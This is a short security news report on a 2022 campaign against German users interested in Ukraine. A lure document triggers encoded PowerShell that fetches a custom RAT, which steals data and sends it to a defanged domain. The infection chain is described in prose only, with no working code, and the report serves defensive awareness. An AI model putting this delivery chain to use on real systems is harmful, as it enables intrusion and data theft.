Security News > 2022 > May > Ukraine supporters in Germany targeted with PowerShell RAT malware

An unknown threat actor is targeting German users interested in the Ukraine crisis, infecting them with a custom PowerShell RAT and stealing their data.
These sites offer malicious documents that install a custom RAT that supports remote command execution and file operations.
Visitors of the site will find a file called "2022-Q2-Bedrohungslage-Ukraine," promising information about the situation in Ukraine and offered for free download. The corresponding section on the site claims that the document is constantly updated with new information, so users are urged to get a fresh copy every day.
In the background the file triggers PowerShell that runs a Base64 deobfuscator leading to fetching and executing a malicious script from the fake site.
Txt file form and a.cmd file that helps execute it through PowerShell.
PowerShell RAT. The custom PowerShell RAT that hides in "Status.txt" begins its malicious operation by collecting basic system information and assigning a unique client ID. This information and anything else stolen from the host computers is exfiltrated to a German domain, "Kleinm[.]de".
News URL
Related news
- Microsoft: New RAT malware used for crypto theft, reconnaissance (source)
- Russia-Linked Gamaredon Uses Troop-Related Lures to Deploy Remcos RAT in Ukraine (source)
- We Smell a (DC)Rat: Revealing a Sophisticated Malware Delivery Chain (source)
- Multi-Stage Malware Attack Uses .JSE and PowerShell to Deploy Agent Tesla and XLoader (source)
- Chinese hackers target Russian govt with upgraded RAT malware (source)